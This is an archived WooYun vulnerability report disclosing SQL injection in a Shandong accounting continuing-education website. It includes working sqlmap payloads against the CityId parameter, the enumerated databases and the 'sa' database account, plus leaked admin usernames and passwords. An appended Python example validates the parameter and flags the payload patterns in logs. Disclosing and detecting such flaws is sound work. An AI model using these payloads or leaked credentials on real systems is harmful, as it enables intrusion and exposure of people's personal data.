
Vulnerability summary

Defect ID: wooyun-2015-0160673

Title: SQL injection in 山东会计人员继续教育网 (Shandong accounting personnel continuing-education site) exposing a large amount of personal information

Vendor: 山东会计人员继续教育网

Author: 路人甲

Submitted: 2015-12-17 23:14

Fixed: 2016-02-01 19:48

Published: 2016-02-01 19:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-12-17: Details sent to the vendor; awaiting vendor handling
2015-12-21: Vendor confirmed; details visible to the vendor only
2015-12-31: Details opened to core white hats and relevant domain experts
2016-01-10: Details opened to regular white hats
2016-01-20: Details opened to intern white hats
2016-02-01: Details opened to the public

Brief description:

The site filters its input parameters improperly, which leads to SQL injection that can leak a large amount of personal information.

Detailed description:

Vulnerable page: http://**.**.**.**/user/City_ajax.aspx?CityId=798729681522

Place: GET
Parameter: CityId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CityId=798729681522' AND 7538=7538 AND 'Ekhs'='Ekhs
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: CityId=798729681522' AND 6928=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(105)+CHAR(115)+CHAR(58)+(SELECT (CASE WHEN (6928=6928) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(116)+CHAR(101)+CHAR(115)+CHAR(58))) AND 'Iogy'='Iogy
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: CityId=798729681522' UNION ALL SELECT NULL,CHAR(58)+CHAR(112)+CHAR(105)+CHAR(115)+CHAR(58)+CHAR(71)+CHAR(71)+CHAR(102)+CHAR(110)+CHAR(105)+CHAR(119)+CHAR(70)+CHAR(117)+CHAR(77)+CHAR(86)+CHAR(58)+CHAR(116)+CHAR(101)+CHAR(115)+CHAR(58),NULL--
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] Bak_RxExam2014
[*] CheShi
[*] kjzfd
[*] master
[*] model
[*] msdb
[*] PowerEducation
[*] ReportServer
[*] ReportServerTempDB
[*] RxEducation2013
[*] RxExam2014
[*] tempdb
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS operating system: Windows 7
back-end DBMS: active fingerprint: Microsoft SQL Server 2008
banner parsing fingerprint: Microsoft SQL Server 2008 R2 Service Pack 0 version 10.50.1600.1
banner:
---
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7600: )
---
current user: 'sa'
current database: 'RxEducation2013'

Proof of vulnerability:

web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: RxEducation2013
[177 tables]
Database: RxEducation2013
Table: dbo.kefu_Users
[4 entries]
+----------+
| userName |
+----------+
| zcy |
| czg |
| ljl |
| kefu |
+----------+
Table: dbo.kefu_Users
[4 entries]
+-----+
| pwd |
+-----+
| zcy |
| czg |
| 1 |
| 1 |
+-----+


The dbo.fs_sys_User table holds a large amount of personal identity information.

[screenshot: user.jpg]

Remediation:

Filter dangerous characters submitted by the client.
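An added example, not part of the original report, that works the remediation and the sqlmap findings above from the defender's side: a strict integer check for CityId (the parameter is a numeric id, so an allow-list beats character filtering) and detection logic that flags the three payload shapes listed in the detailed description when they appear in request logs. The log lines are constructed for this example; the endpoint path is the one in the report and the host is omitted.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests (method, path, status) against the endpoint in the report.
# One benign request, then the three sqlmap technique shapes the report lists.
SAMPLE_LOG = [
    "GET /user/City_ajax.aspx?CityId=798729681522 200",
    "GET /user/City_ajax.aspx?CityId=798729681522'+AND+7538%3D7538+AND+'Ekhs'%3D'Ekhs 200",
    "GET /user/City_ajax.aspx?CityId=798729681522'+AND+6928%3DCONVERT(INT,(CHAR(58)%2BCHAR(112)))+AND+'Iogy'%3D'Iogy 500",
    "GET /user/City_ajax.aspx?CityId=798729681522'+UNION+ALL+SELECT+NULL,CHAR(58),NULL-- 200",
]

# Signatures for the three techniques sqlmap reported: boolean tautology,
# MSSQL CONVERT(INT, ...) error-based extraction, and a UNION ALL SELECT.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
    ("error-based (CONVERT)", re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I)),
]


def validate_city_id(raw: str):
    """Allow-list check a fix should apply before any SQL is built:
    CityId must be a plain ASCII decimal integer. Returns the int or None."""
    return int(raw) if re.fullmatch(r"[0-9]+", raw) else None


def classify(raw: str) -> str:
    """Name the injection technique a rejected value resembles, or 'unknown'."""
    for name, pattern in SIGNATURES:
        if pattern.search(raw):
            return name
    return "unknown"


def scan_log(lines):
    """Return (decoded CityId value, technique) for every request whose
    CityId fails validation. parse_qs decodes %xx and '+' for us."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # malformed line, skip rather than crash
        query = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
        for raw in query.get("CityId", []):
            if validate_city_id(raw) is None:
                findings.append((raw, classify(raw)))
    return findings
```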

Copyright notice: credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-21 16:42

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded through CNCERT to the Shandong branch center, which will coordinate handling with the website's operating organization.

Latest status:

None yet